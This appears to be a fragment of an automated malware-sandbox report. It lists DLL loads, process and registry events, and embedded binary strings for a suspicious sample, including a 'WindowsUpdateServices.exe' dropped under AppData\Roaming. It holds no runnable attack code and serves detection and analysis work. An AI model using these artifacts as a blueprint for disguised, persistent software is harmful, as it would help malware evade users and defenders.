                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: acgenral.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: msacm32.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: aclayers.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: sfc.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: sfc_os.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Roaming\wsruwiiWindow detected: Number of UI elements: 13
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
                        Source: Og1SeeXcB2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdb source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DE5A.exe, 00000016.00000002.2478711544.00007FFE1A4F1000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DE5A.exe, 00000016.00000002.2475941102.00007FFE1A481000.00000040.00000001.01000000.00000018.sdmp, DE5A.exe, 0000002E.00000002.2598135360.00007FFE1A481000.00000040.00000001.01000000.00000028.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
